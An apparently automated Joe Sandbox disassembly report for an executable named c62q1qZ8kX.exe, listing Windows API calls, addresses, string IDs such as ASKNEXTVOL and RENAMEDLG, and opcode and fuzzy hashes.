                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: ec3230121a2afd45fd274e6e06da553c05bbf9dd1beba43695ac4b9ce908ec0c
                • Instruction ID: 798091ce33b49b6e90c59e66a9858391d38eb88867eef4e24c38636b5627c601
                • Opcode Fuzzy Hash: ec3230121a2afd45fd274e6e06da553c05bbf9dd1beba43695ac4b9ce908ec0c
                • Instruction Fuzzy Hash: F5F04F30A1971DBBDB159B95EC0DBAEBFB9EF04721F104068F809E2191DB748E40CA94
                APIs
                  • Part of subcall function 001E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001E00A0
                  • Part of subcall function 001E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001DEB86,Crypt32.dll,00000000,001DEC0A,?,?,001DEBEC,?,?,?), ref: 001E00C2
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001DEB92
                • GetProcAddress.KERNEL32(002181C0,CryptUnprotectMemory), ref: 001DEBA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: 7b0912ce44bd66edf5e3baababd9879a33525fe8aa997045fad1a45fcc569014
                • Instruction ID: ae2569fc935752dfbc458a0c1ba6c40e18efba66c7575eebcbea68581a2a3e50
                • Opcode Fuzzy Hash: 7b0912ce44bd66edf5e3baababd9879a33525fe8aa997045fad1a45fcc569014
                • Instruction Fuzzy Hash: D3E04F704117419EDB21DF39A808B46BEE85B15706F00881EF4D6D3682D7F4D5808B60
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: a88e4f89cba7865253218e87ede717040edcdd17d18085481ff7c972beb295dc
                • Instruction ID: 24c47c1f471e95ae60fe1663a1d9c79e15c9004f99501481dfa925595bab0252
                • Opcode Fuzzy Hash: a88e4f89cba7865253218e87ede717040edcdd17d18085481ff7c972beb295dc
                • Instruction Fuzzy Hash: 9441D336A003089FCB24DF78D881A6EB7E5EF99714F1545A9E615EB382DB31ED01CB80
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 001FB619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001FB63C
                  • Part of subcall function 001F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001FC13D,00000000,?,001F67E2,?,00000008,?,001F89AD,?,?,?), ref: 001F854A
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001FB662
                • _free.LIBCMT ref: 001FB675
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001FB684
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 53daef884f6582a3a8fbe318dcef38d6b597a2b1e2c33476c09f6187398db236
                • Instruction ID: 571f03f36ff5c26a41b07eecec7d93a795a7d513f2ec293eed8e02182d917d22
                • Opcode Fuzzy Hash: 53daef884f6582a3a8fbe318dcef38d6b597a2b1e2c33476c09f6187398db236
                • Instruction Fuzzy Hash: 710184B2605719BF63215A76ACCCC7B6A6DEEC6BB03250229BE04C7111EF60CD0191B0
                APIs
                  • Part of subcall function 001E0A41: ResetEvent.KERNEL32(?), ref: 001E0A53
                  • Part of subcall function 001E0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001E0A67
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 001E078F
                • CloseHandle.KERNEL32(?,?), ref: 001E07A9
                • DeleteCriticalSection.KERNEL32(?), ref: 001E07C2
                • CloseHandle.KERNEL32(?), ref: 001E07CE
                • CloseHandle.KERNEL32(?), ref: 001E07DA
                  • Part of subcall function 001E084E: WaitForSingleObject.KERNEL32(?,000000FF,001E0A78,?), ref: 001E0854
                  • Part of subcall function 001E084E: GetLastError.KERNEL32(?), ref: 001E0860
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                • Opcode ID: 87d438ac925c2c42d01b90a65fe73887beb082f8412f60c2955c9ad019a05fc8
                • Instruction ID: 2c6ac796af7717c93d96cf3a97f0e3e6560bc2c92ff61a82997068ccf2ed7c7b
                • Opcode Fuzzy Hash: 87d438ac925c2c42d01b90a65fe73887beb082f8412f60c2955c9ad019a05fc8
                • Instruction Fuzzy Hash: A801B571440B44EFC722DB65EC88FCABBEEFB49710F004529F15A421A1CBB56A84CB90
                APIs
                • _free.LIBCMT ref: 001FBF28
                  • Part of subcall function 001F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?), ref: 001F84F4
                  • Part of subcall function 001F84DE: GetLastError.KERNEL32(?,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?,?), ref: 001F8506
                • _free.LIBCMT ref: 001FBF3A
                • _free.LIBCMT ref: 001FBF4C
                • _free.LIBCMT ref: 001FBF5E
                • _free.LIBCMT ref: 001FBF70
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 664b3a77d466e17733dd7455a31199845425de4d4b7d337fc0b1ccebb50ee410
                • Instruction ID: fea3ce963399d79a2fe8b2f7c867f15e5811ffd4a99ce2035d11517ec3a765f4
                • Opcode Fuzzy Hash: 664b3a77d466e17733dd7455a31199845425de4d4b7d337fc0b1ccebb50ee410
                • Instruction Fuzzy Hash: 21F0F933508209ABCA20EF68FECAD2A73EDFA107107654C09F219D7D11CB34FC808A64
                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\c62q1qZ8kX.exe,00000104), ref: 001F76FD
                • _free.LIBCMT ref: 001F77C8
                • _free.LIBCMT ref: 001F77D2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\c62q1qZ8kX.exe
                • API String ID: 2506810119-202290201
                • Opcode ID: e04d2a506fe211cb98df1c196bd04278cbaa3e54d9104719c51cee75ea100711
                • Instruction ID: a54e3568c2139bd9c32bcf65091f6b6a4a32ed8248293ea4efb718d69d3bbbf0
                • Opcode Fuzzy Hash: e04d2a506fe211cb98df1c196bd04278cbaa3e54d9104719c51cee75ea100711
                • Instruction Fuzzy Hash: CC316071A1421CAFDB21EF99EC899BEBBFCEB95710F244166E60497251D7708E40CBA0
                APIs
                • __EH_prolog.LIBCMT ref: 001D7579
                  • Part of subcall function 001D3B3D: __EH_prolog.LIBCMT ref: 001D3B42
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 001D7640
                  • Part of subcall function 001D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 001D7C04
                  • Part of subcall function 001D7BF5: GetLastError.KERNEL32 ref: 001D7C4A
                  • Part of subcall function 001D7BF5: CloseHandle.KERNEL32(?), ref: 001D7C59
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                • Opcode ID: 162085f526d9e2f5362ee55e2002464e7ce107a34298ec37f6a507b11b9741ac
                • Instruction ID: a11140d9a298e63ce22bf619dea666a81e3c7b2aae570e536e8b837472030935
                • Opcode Fuzzy Hash: 162085f526d9e2f5362ee55e2002464e7ce107a34298ec37f6a507b11b9741ac
                • Instruction Fuzzy Hash: D431EA71908348AEEF20EB65EC45BEEBBB9AF25354F00405BF444A73D2EBB48944C761
                APIs
                  • Part of subcall function 001D130B: GetDlgItem.USER32(00000000,00003021), ref: 001D134F
                  • Part of subcall function 001D130B: SetWindowTextW.USER32(00000000,002035B4), ref: 001D1365
                • EndDialog.USER32(?,00000001), ref: 001EA4B8
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 001EA4CD
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 001EA4E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                • Opcode ID: a01ee5caa4e09846addf34a7b775fa2cc41a9fecd4453beb034d9dcebb030046
                • Instruction ID: 560220dbc9cfcf9fa19e2bcf508e2e6bd162d62693d74d6f9cb2c57848891474
                • Opcode Fuzzy Hash: a01ee5caa4e09846addf34a7b775fa2cc41a9fecd4453beb034d9dcebb030046
                • Instruction Fuzzy Hash: 5211E632248680BFD7219FA9EC4DF6A37A9EF5A300F584402F3419B1E0C7A1A905D732
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: __fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 1857242416-834177443
                • Opcode ID: 89d65903fa99e6e25e31bdafc95692cdf2529fc62bebd6537c48ba70aa66ea69
                • Instruction ID: 1f830e09c9d901f11fb65e4a60bfb41d8ca403f73864e66b5563aad72880cf49
                • Opcode Fuzzy Hash: 89d65903fa99e6e25e31bdafc95692cdf2529fc62bebd6537c48ba70aa66ea69
                • Instruction Fuzzy Hash: 7F218E3244034CAADF20DEA4DC46FEE7BACEF15300F040513FA1596292E371EA55DB51
                APIs
                • _swprintf.LIBCMT ref: 001DB51E
                  • Part of subcall function 001D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001D401D
                • _wcschr.LIBVCRUNTIME ref: 001DB53C
                • _wcschr.LIBVCRUNTIME ref: 001DB54C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                • Opcode ID: a157af02867afa9dc741c176d8561690da62c8c04f7c306afff082657e5f7737
                • Instruction ID: fb978e928ad70186bcff52a7b525213ba162cac86d5666f1ad2cf55eae28adfa
                • Opcode Fuzzy Hash: a157af02867afa9dc741c176d8561690da62c8c04f7c306afff082657e5f7737
                • Instruction Fuzzy Hash: 11012D53908311FBDB20AB75ACC2C7BB7ACDEA63A07914417F946C6291FB30D950C3A1
                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,001DABC5,00000008,?,00000000,?,001DCB88,?,00000000), ref: 001E06F3
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,001DABC5,00000008,?,00000000,?,001DCB88,?,00000000), ref: 001E06FD
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,001DABC5,00000008,?,00000000,?,001DCB88,?,00000000), ref: 001E070D
                Strings
                • Thread pool initialization failed., xrefs: 001E0725
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                • Opcode ID: 4d1d34096c34c0337414f4609ccf7decb769c39f0e472953ae567cab45dbf990
                • Instruction ID: 803165fd61addca36a8c68ac5730a8e0729b7b9ef12faf78eb082b5cae64225c
                • Opcode Fuzzy Hash: 4d1d34096c34c0337414f4609ccf7decb769c39f0e472953ae567cab45dbf990
                • Instruction Fuzzy Hash: 2D1173B1501709AFD3315F66D888AABFBECEB99754F10482EF1DA82201D7B169C1CB50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                • Opcode ID: aacc09562b27fb02e1bf02629ec266e45a10e1ebec0502c85997b11d7f290759
                • Instruction ID: f8bae4dc4a0b2eb04a500dff30c1c759fd4ebd3935c363a723558151d401d99e
                • Opcode Fuzzy Hash: aacc09562b27fb02e1bf02629ec266e45a10e1ebec0502c85997b11d7f290759
                • Instruction Fuzzy Hash: 2B0171B1604686AFDB119F66FD8CE9A7BE9F724380B048421F505D2271DF719C50EBA1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                • Instruction ID: 2a711978b7f3a6e3f52d1bf0605e02d9ceceea5637dad0c63f2be16dc0b53f56
                • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                • Instruction Fuzzy Hash: 16A1787290478A9FDB25EF68C8917BEBBE5FF65310F18416DEA859B281C3388942C750
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,001D80B7,?,?,?), ref: 001DA351
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,001D80B7,?,?), ref: 001DA395
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,001D80B7,?,?,?,?,?,?,?,?), ref: 001DA416
                • CloseHandle.KERNEL32(?,?,00000000,?,001D80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 001DA41D
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 6a40c59daf0710026d7f870727d286b5879688f21ccda5e2ee8dc8efc7e9ea1b
                • Instruction ID: 3035d351515421e8998e5964a34edb5aeeabad42185de9ee0e6bd9c8afe8daae
                • Opcode Fuzzy Hash: 6a40c59daf0710026d7f870727d286b5879688f21ccda5e2ee8dc8efc7e9ea1b
                • Instruction Fuzzy Hash: B741CA31288381AAE731DF24DC45BAEBBE9AF95700F48091EF5D093281D7A49A48DB53
                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001F89AD,?,00000000,?,00000001,?,?,00000001,001F89AD,?), ref: 001FC0E6
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001FC16F
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001F67E2,?), ref: 001FC181
                • __freea.LIBCMT ref: 001FC18A
                  • Part of subcall function 001F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001FC13D,00000000,?,001F67E2,?,00000008,?,001F89AD,?,?,?), ref: 001F854A
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: a4938974c43b34ae882687b4f82b8237dfc27e7a98fec8bd9f9ad2f9096a9edc
                • Instruction ID: 540a8f1232331862947c91064ea359c1167de24dde480161000dcf2d6124b4bc
                • Opcode Fuzzy Hash: a4938974c43b34ae882687b4f82b8237dfc27e7a98fec8bd9f9ad2f9096a9edc
                • Instruction Fuzzy Hash: 7D31BC72A0021EABDB24CF65DC45DBE7BA9EB44310F150228FD0497292EB35CD61DBE0
                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 001F251A
                  • Part of subcall function 001F2B52: ___AdjustPointer.LIBCMT ref: 001F2B9C
                • _UnwindNestedFrames.LIBCMT ref: 001F2531
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 001F2543
                • CallCatchBlock.LIBVCRUNTIME ref: 001F2567
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID:
                • API String ID: 2633735394-0
                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction ID: afc2ac357388cff7e5caed9d01a9aec103c091e72e2a0e6ffdfc96f327543d82
